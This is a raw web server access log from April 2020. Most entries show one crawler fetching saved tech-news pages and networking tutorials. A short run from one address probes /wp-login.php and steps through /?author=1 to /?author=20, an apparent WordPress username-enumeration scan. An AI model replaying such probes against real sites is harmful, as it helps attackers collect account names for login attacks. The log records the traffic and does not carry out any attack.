5.9.32.222 - - [24/Apr/2020:10:49:49 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/container_003.htm HTTP/1.1" 200 26583
5.9.32.222 - - [24/Apr/2020:10:49:51 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/container_004.htm HTTP/1.1" 200 26745
90.143.163.253 - - [24/Apr/2020:10:49:59 -0400] "GET /depository/crypto/Cryptography_history.pdf HTTP/1.1" 200 632913
5.9.32.222 - - [24/Apr/2020:10:50:00 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/container_005.htm HTTP/1.1" 200 26741
5.9.32.222 - - [24/Apr/2020:10:50:02 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/container_data/ HTTP/1.1" 200 1108
5.9.32.222 - - [24/Apr/2020:10:50:04 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/container_data_002/ HTTP/1.1" 200 948
213.180.203.118 - - [24/Apr/2020:10:50:05 -0400] "GET /3/optic_32.htm HTTP/1.1" 200 48761
66.249.64.46 - - [24/Apr/2020:10:50:06 -0400] "GET /depository///rfcs/5900/rfc5934.txt HTTP/1.1" 200 196043
5.9.32.222 - - [24/Apr/2020:10:50:07 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/container_data_003/ HTTP/1.1" 200 948
5.9.32.222 - - [24/Apr/2020:10:50:10 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/container_data_004/ HTTP/1.1" 200 948
213.180.203.118 - - [24/Apr/2020:10:50:24 -0400] "GET /depository/newest_tech/Intel_could_prolong_Moore's_Law_with_new_materials,transistors.html HTTP/1.1" 200 349031
66.249.64.48 - - [24/Apr/2020:10:50:50 -0400] "GET /4/44/tcp_443 HTTP/1.1" 200 61723
176.212.82.236 - - [24/Apr/2020:10:50:53 -0400] "GET /4/41/pon.htm HTTP/1.1" 200 52444
154.16.91.69 - - [24/Apr/2020:10:51:23 -0400] "GET /depository/mptcp/CAIA-TR-130424A.pdf HTTP/1.0" 200 382560
5.9.32.222 - - [24/Apr/2020:10:51:24 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/container_data_005/ HTTP/1.1" 200 1042
5.9.32.222 - - [24/Apr/2020:10:51:26 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/dest5.htm HTTP/1.1" 200 6939
5.9.32.222 - - [24/Apr/2020:10:51:43 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/dest5_002.htm HTTP/1.1" 200 6939
5.9.32.222 - - [24/Apr/2020:10:52:08 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/ff8dacc HTTP/1.1" 200 30618
114.119.163.92 - - [24/Apr/2020:10:52:14 -0400] "GET /depository/quant_comp/quant_comp/10%20hot%20quantum-computing%20startups%20to%20watch%20%20%20Network%20World_files/api.js HTTP/1.1" 200 762
91.226.34.35 - - [24/Apr/2020:10:52:15 -0400] "GET /10/ascii.htm HTTP/1.1" 200 36979
31.207.65.211 - - [24/Apr/2020:10:52:30 -0400] "GET /10/ascii.htm HTTP/1.1" 200 36979
46.229.168.163 - - [24/Apr/2020:10:52:37 -0400] "GET /depository/cyberwar/Cyberwar%20%20A%20guide%20to%20the%20frightening%20future%20of%20online%20conflict%20_%20ZDNet_files/a_data_009/ HTTP/1.1" 200 619
5.9.32.222 - - [24/Apr/2020:10:52:49 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/jpt HTTP/1.1" 200 12721
5.9.32.222 - - [24/Apr/2020:10:52:53 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/jpt_002 HTTP/1.1" 200 7107
5.9.32.222 - - [24/Apr/2020:10:52:57 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/jpt_003 HTTP/1.1" 200 7143
213.180.203.118 - - [24/Apr/2020:10:52:59 -0400] "GET /depository/forecasts/IDG%20Connect%20%96%20What%20Will%20Be%20Hot%20and%20What%20Will%20Not%20in%202015%20Tech%20Trends_files/postmessageRelay.htm HTTP/1.1" 200 679
5.9.32.222 - - [24/Apr/2020:10:53:00 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/jpt_004 HTTP/1.1" 200 7131
5.9.32.222 - - [24/Apr/2020:10:53:02 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/jpt_005 HTTP/1.1" 200 7163
5.9.32.222 - - [24/Apr/2020:10:53:03 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/jpt_006 HTTP/1.1" 200 7183
5.9.32.222 - - [24/Apr/2020:10:53:05 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/ls.htm HTTP/1.1" 200 10564
5.9.32.222 - - [24/Apr/2020:10:53:06 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/ls_002.htm HTTP/1.1" 200 12015
5.9.32.222 - - [24/Apr/2020:10:53:11 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/ls_data/ HTTP/1.1" 200 748
5.9.32.222 - - [24/Apr/2020:10:53:34 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/n.htm HTTP/1.1" 200 64
5.9.32.222 - - [24/Apr/2020:10:53:37 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/rtifr.htm HTTP/1.1" 200 1081
5.9.32.222 - - [24/Apr/2020:10:53:43 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/rtifr_data/ HTTP/1.1" 200 1424
17.58.97.137 - - [24/Apr/2020:10:54:04 -0400] "GET /4/44/m_polit.htm HTTP/1.1" 200 15196
95.79.111.31 - - [24/Apr/2020:10:54:24 -0400] "GET /1/intro1.htm HTTP/1.1" 200 77738
77.121.202.134 - - [24/Apr/2020:10:54:30 -0400] "GET /10/ascii.htm HTTP/1.1" 200 36979
91.224.69.166 - - [24/Apr/2020:10:54:37 -0400] "GET /4/41/pon.htm HTTP/1.1" 200 52444
5.9.32.222 - - [24/Apr/2020:10:54:48 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/syncframe.htm HTTP/1.1" 200 2704
5.9.32.222 - - [24/Apr/2020:10:54:50 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/tag.aspx HTTP/1.1" 200 26171
5.9.32.222 - - [24/Apr/2020:10:55:05 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/tboptevent.htm HTTP/1.1" 200 114
5.9.32.222 - - [24/Apr/2020:10:55:07 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/tboptevent_002.htm HTTP/1.1" 200 114
5.9.32.222 - - [24/Apr/2020:10:55:11 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/user_sync.htm HTTP/1.1" 200 11610
41.188.51.204 - - [24/Apr/2020:10:55:19 -0400] "GET /depository/telework/Aerohive-Telework-ebook.pdf HTTP/1.1" 200 560490
5.9.32.222 - - [24/Apr/2020:10:55:20 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/user_sync_data/ HTTP/1.1" 200 854
5.9.32.222 - - [24/Apr/2020:10:55:23 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/usermatch.htm HTTP/1.1" 200 701
95.79.111.31 - - [24/Apr/2020:10:55:25 -0400] "GET /6/sign_643.htm HTTP/1.1" 200 11991
5.9.32.222 - - [24/Apr/2020:10:55:35 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/usermatch_data/ HTTP/1.1" 200 964
213.180.203.118 - - [24/Apr/2020:10:55:35 -0400] "GET /depository/rfcs/2800/rfc2825.txt HTTP/1.1" 200 16007
5.9.32.222 - - [24/Apr/2020:10:55:48 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/v2 HTTP/1.1" 200 1673
5.9.32.222 - - [24/Apr/2020:10:55:51 -0400] "GET /depository//////////languages/Julia's%20big%20plan%20to%20break%20into%20enterprise%20%20What's%20next%20for%20the%20fast-growing%20programming%20language%20-%20TechRepublic_files/v2_002 HTTP/1.1" 200 595
109.252.20.212 - - [24/Apr/2020:10:55:51 -0400] "GET /4/44/rut_4411.htm HTTP/1.1" 200 50775
178.92.245.174 - - [24/Apr/2020:10:55:52 -0400] "GET /10/ascii.htm HTTP/1.1" 200 36979
5.9.32.222 - - [24/Apr/2020:10:55:53 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/1068cf12f6 HTTP/1.1" 200 41
87.255.1.48 - - [24/Apr/2020:10:55:56 -0400] "GET /4/7/memory.htm HTTP/1.1" 200 35794
5.9.32.222 - - [24/Apr/2020:10:55:57 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/container.html HTTP/1.1" 200 4018
5.9.32.222 - - [24/Apr/2020:10:55:59 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/getuid HTTP/1.1" 200 43
5.9.32.222 - - [24/Apr/2020:10:56:02 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/pixel.php HTTP/1.1" 200 474532
5.9.32.222 - - [24/Apr/2020:10:56:06 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/saved_resource HTTP/1.1" 200 43
5.9.32.222 - - [24/Apr/2020:10:56:10 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/saved_resource(1) HTTP/1.1" 200 85
178.124.175.218 - - [24/Apr/2020:10:56:11 -0400] "GET /3/optic_32.htm HTTP/1.1" 200 48761
5.9.32.222 - - [24/Apr/2020:10:56:12 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/saved_resource(2) HTTP/1.1" 200 85
5.9.32.222 - - [24/Apr/2020:10:56:15 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/saved_resource(3) HTTP/1.1" 200 85
91.218.86.18 - - [24/Apr/2020:10:56:23 -0400] "GET /10/ascii.htm HTTP/1.1" 200 36979
109.252.20.212 - - [24/Apr/2020:10:56:24 -0400] "GET /4/44/rip44111.htm HTTP/1.1" 200 13590
109.252.20.212 - - [24/Apr/2020:10:56:25 -0400] "GET /4/44/osp44112.htm HTTP/1.1" 200 32455
109.252.20.212 - - [24/Apr/2020:10:56:25 -0400] "GET /4/44/igp44113.htm HTTP/1.1" 200 21631
109.252.20.212 - - [24/Apr/2020:10:56:26 -0400] "GET /4/44/bgp44114.htm HTTP/1.1" 200 38044
109.252.20.212 - - [24/Apr/2020:10:56:27 -0400] "GET /4/44/cidr4115.htm HTTP/1.1" 200 5050
109.252.20.212 - - [24/Apr/2020:10:56:28 -0400] "GET /4/44/as.htm HTTP/1.1" 200 4622
109.252.20.212 - - [24/Apr/2020:10:56:28 -0400] "GET /4/4/rpsl.htm HTTP/1.1" 200 141463
109.252.20.212 - - [24/Apr/2020:10:56:28 -0400] "GET /4/44/m_polit.htm HTTP/1.1" 200 15196
109.252.20.212 - - [24/Apr/2020:10:56:29 -0400] "GET //4/4/rfc2858.htm HTTP/1.1" 200 19762
95.191.18.123 - - [24/Apr/2020:10:56:37 -0400] "GET /4/43/sdh_436.htm HTTP/1.1" 200 22926
5.9.32.222 - - [24/Apr/2020:10:56:46 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/saved_resource(4) HTTP/1.1" 200 43
5.9.32.222 - - [24/Apr/2020:10:56:49 -0400] "GET /depository//////////log_man/Network%20management%20projects%20top%20list%20of%202015%20IT%20initiatives_files/seg HTTP/1.1" 200 43
5.9.32.222 - - [24/Apr/2020:10:56:53 -0400] "GET /depository//////////mainframe/3D%22http://www.computerworld.com/s/article/9236629/IBM_39_s_mainframe= HTTP/1.1" 404 302
5.9.32.222 - - [24/Apr/2020:10:56:59 -0400] "GET /depository//////////mobile/GSM%20encryption%20%20No%20need%20to%20crack%20it,%20just%20turn%20it%20off%20%20%20TechRepublic_files/GSM%20encryption%20%20No%20need%20to%20crack%20it,%20just%20turn%20it%20off%20%20%20TechRepublic.htm HTTP/1.1" 404 372
5.9.32.222 - - [24/Apr/2020:10:57:00 -0400] "GET /depository//////////mobile/3D%22http://www.computerweekly.com/?vgnextfmt=3Dportfolio%22 HTTP/1.1" 404 263
213.251.249.180 - - [24/Apr/2020:10:57:09 -0400] "GET /depository/iot/The%20security%20tsunami%20of%20the%20Internet%20of%20Things%20is%20coming,%20are%20you%20ready%20%20-%20TechRepublic_files/imsync.htm HTTP/1.1" 200 4777
5.9.32.222 - - [24/Apr/2020:10:57:09 -0400] "GET /depository//////////mobile/3D%22http://www.computerweekly.com/news%22 HTTP/1.1" 404 273
95.79.111.31 - - [24/Apr/2020:10:57:10 -0400] "GET /6/pgp_644.htm HTTP/1.1" 200 8380
91.221.218.20 - - [24/Apr/2020:10:57:17 -0400] "GET /4/45/radius1.htm HTTP/1.1" 200 90355
5.9.32.222 - - [24/Apr/2020:10:57:28 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/CKPRf1FLKH0.htm HTTP/1.1" 200 29734
5.9.32.222 - - [24/Apr/2020:10:57:42 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/Wireless HTTP/1.1" 200 43
5.9.32.222 - - [24/Apr/2020:10:57:45 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/ZEbdHPQfV3x(1).htm HTTP/1.1" 200 27326
5.9.32.222 - - [24/Apr/2020:10:57:48 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/ZEbdHPQfV3x.htm HTTP/1.1" 200 27302
5.9.32.222 - - [24/Apr/2020:10:57:50 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/ads HTTP/1.1" 200 43
5.9.32.222 - - [24/Apr/2020:10:57:52 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/cb=gapi.loaded_0 HTTP/1.1" 200 228137
5.9.32.222 - - [24/Apr/2020:10:57:55 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/cb=gapi.loaded_1 HTTP/1.1" 200 2430
5.9.32.222 - - [24/Apr/2020:10:57:56 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/cb=gapi.loaded_2 HTTP/1.1" 200 71
5.9.32.222 - - [24/Apr/2020:10:57:59 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/checkOAuth.esi HTTP/1.1" 200 22
5.9.32.222 - - [24/Apr/2020:10:58:03 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/container.html HTTP/1.1" 200 43
5.9.32.222 - - [24/Apr/2020:10:58:05 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/controltag HTTP/1.1" 200 7177
3.249.126.163 - - [24/Apr/2020:10:58:06 -0400] "GET /depository/iot/Internet_of_Things_Demands_Security_by_Design.htm HTTP/1.1" 200 318478
5.9.32.222 - - [24/Apr/2020:10:58:08 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/controltag.js.050ca6784d391624b5d1dbe8bf59b021 HTTP/1.1" 200 87062
92.50.219.10 - - [24/Apr/2020:10:58:09 -0400] "GET /4/44/sntp4416.htm HTTP/1.1" 200 37689
5.9.32.222 - - [24/Apr/2020:10:58:11 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/elqBlank.htm HTTP/1.1" 200 257
5.9.32.222 - - [24/Apr/2020:10:58:14 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/fastbutton(1).htm HTTP/1.1" 200 30350
5.9.32.222 - - [24/Apr/2020:10:58:19 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/fastbutton(2).htm HTTP/1.1" 200 30349
5.9.32.222 - - [24/Apr/2020:10:58:21 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/fastbutton(3).htm HTTP/1.1" 200 30349
5.9.32.222 - - [24/Apr/2020:10:58:22 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/fastbutton.htm HTTP/1.1" 200 30351
5.9.32.222 - - [24/Apr/2020:10:58:26 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/getAllAppDefault.esi HTTP/1.1" 200 162
5.9.32.222 - - [24/Apr/2020:10:58:29 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/getCount2.php HTTP/1.1" 200 308
5.9.32.222 - - [24/Apr/2020:10:58:33 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/getSegment.htm HTTP/1.1" 200 1660
5.9.32.222 - - [24/Apr/2020:10:58:35 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/hub(1).htm HTTP/1.1" 200 26124
5.9.32.222 - - [24/Apr/2020:10:58:39 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/hub.htm HTTP/1.1" 200 26123
5.9.32.222 - - [24/Apr/2020:10:58:42 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/index.18e1c238a4cb008d943dfa8e4cb52b94.htm HTTP/1.1" 200 32867
5.9.32.222 - - [24/Apr/2020:10:58:45 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/ip(1).json HTTP/1.1" 200 55
5.9.32.222 - - [24/Apr/2020:10:58:47 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/ip.json HTTP/1.1" 200 524
5.9.32.222 - - [24/Apr/2020:10:58:49 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/jsapi HTTP/1.1" 200 24688
114.119.160.250 - - [24/Apr/2020:10:59:05 -0400] "GET /depository/quant_comp/quant_comp/10%20hot%20quantum-computing%20startups%20to%20watch%20%20%20Network%20World_files/ADTECH HTTP/1.1" 200 66
5.9.32.222 - - [24/Apr/2020:10:59:06 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/like(1).htm HTTP/1.1" 200 19240
5.9.32.222 - - [24/Apr/2020:10:59:09 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/like.htm HTTP/1.1" 200 19245
2.59.242.95 - - [24/Apr/2020:10:59:19 -0400] "GET /4/41/p2p.htm HTTP/1.1" 200 37088
109.93.158.189 - - [24/Apr/2020:10:59:21 -0400] "GET /depository/cyberwar/P.W.Singer_Allan_Friedman_Cybersecurity_and_Cyberwar_What_Everyone_Needs_to_Know_2014_Oxford_University_Press.pdf HTTP/1.1" 200 1421025
66.249.64.46 - - [24/Apr/2020:10:59:34 -0400] "GET /depository//rfcs/5700/rfc5709.txt HTTP/1.1" 200 31008
17.58.97.137 - - [24/Apr/2020:10:59:42 -0400] "GET /4/45/network_r.htm HTTP/1.1" 200 212479
5.9.32.222 - - [24/Apr/2020:10:59:45 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/login_button.htm HTTP/1.1" 200 18136
5.9.32.222 - - [24/Apr/2020:11:00:55 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/optout_check HTTP/1.1" 200 90
5.9.32.222 - - [24/Apr/2020:11:00:59 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/postmessageRelay.htm HTTP/1.1" 200 700
5.9.32.222 - - [24/Apr/2020:11:01:08 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/s-3271.xgi HTTP/1.1" 200 43
5.9.32.222 - - [24/Apr/2020:11:01:10 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/saved_resource.htm HTTP/1.1" 200 22697
5.9.32.222 - - [24/Apr/2020:11:01:33 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/secureAnonymousFramework HTTP/1.1" 200 164551
5.9.32.222 - - [24/Apr/2020:11:01:40 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/svrGP.aspx HTTP/1.1" 200 49
5.9.32.222 - - [24/Apr/2020:11:01:43 -0400] "GET /depository//////////mobile/10%20years%20in%20tech%20%20The%20crazy%20cellphone%20ideas%20of%202004%20%20%20ITworld_files/ws-5.htm HTTP/1.1" 200 8721
111.231.225.71 - - [24/Apr/2020:11:01:43 -0400] "GET /wp-login.php HTTP/1.1" 404 210
5.9.32.222 - - [24/Apr/2020:11:01:47 -0400] "GET /depository//////////mobile/GSM%20encryption%20%20No%20need%20to%20crack%20it,%20just%20turn%20it%20off%20%20%20TechRepublic_files/2748 HTTP/1.1" 200 43
111.231.225.71 - - [24/Apr/2020:11:01:49 -0400] "GET /?author=1 HTTP/1.1" 200 322
46.229.168.162 - - [24/Apr/2020:11:01:50 -0400] "GET /content/internet_prog.htm HTTP/1.1" 200 7443
111.231.225.71 - - [24/Apr/2020:11:01:51 -0400] "GET /?author=2 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:01:53 -0400] "GET /?author=4 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:01:53 -0400] "GET /?author=3 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:01:54 -0400] "GET /?author=5 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:01:56 -0400] "GET /?author=6 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:01:57 -0400] "GET /?author=7 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:01:58 -0400] "GET /?author=8 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:01:59 -0400] "GET /?author=9 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:00 -0400] "GET /?author=10 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:02 -0400] "GET /?author=11 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:03 -0400] "GET /?author=13 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:03 -0400] "GET /?author=12 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:04 -0400] "GET /?author=14 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:04 -0400] "GET /?author=15 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:05 -0400] "GET /?author=16 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:06 -0400] "GET /?author=17 HTTP/1.1" 200 322
87.226.160.250 - - [24/Apr/2020:11:02:06 -0400] "GET /4/41/feth4112.htm HTTP/1.1" 200 77825
79.172.8.245 - - [24/Apr/2020:11:02:06 -0400] "GET /10/ascii.htm HTTP/1.1" 200 36979
111.231.225.71 - - [24/Apr/2020:11:02:07 -0400] "GET /?author=18 HTTP/1.1" 200 322
111.231.225.71 - - [24/Apr/2020:11:02:08 -0400] "GET /?author=19 HTTP/1.1" 200 322
54.246.134.22 - - [24/Apr/2020:11:02:09 -0400] "GET /depository/robotics/Industrial%20robots%20are%20more%20vulnerable%20to%20cyberattacks%20than%20you%20think%20-%20TechRepublic_files/industrial-robots-are-more-vulnerable-to-cyberattacks-than-you-think.htm HTTP/1.1" 200 198025
111.231.225.71 - - [24/Apr/2020:11:02:10 -0400] "GET /?author=20 HTTP/1.1" 200 322
213.180.203.118 - - [24/Apr/2020:11:02:11 -0400] "GET /depository/i2p/I2NP_I2P.mht HTTP/1.1" 200 48480
5.9.32.222 - - [24/Apr/2020:11:02:32 -0400] "GET /depository//////////mobile/GSM%20encryption%20%20No%20need%20to%20crack%20it,%20just%20turn%20it%20off%20%20%20TechRepublic_files/3318.htm HTTP/1.1" 200 889
5.9.32.222 - - [24/Apr/2020:11:02:33 -0400] "GET /depository//////////mobile/GSM%20encryption%20%20No%20need%20to%20crack%20it,%20just%20turn%20it%20off%20%20%20TechRepublic_files/B7269634.htm HTTP/1.1" 200 8928
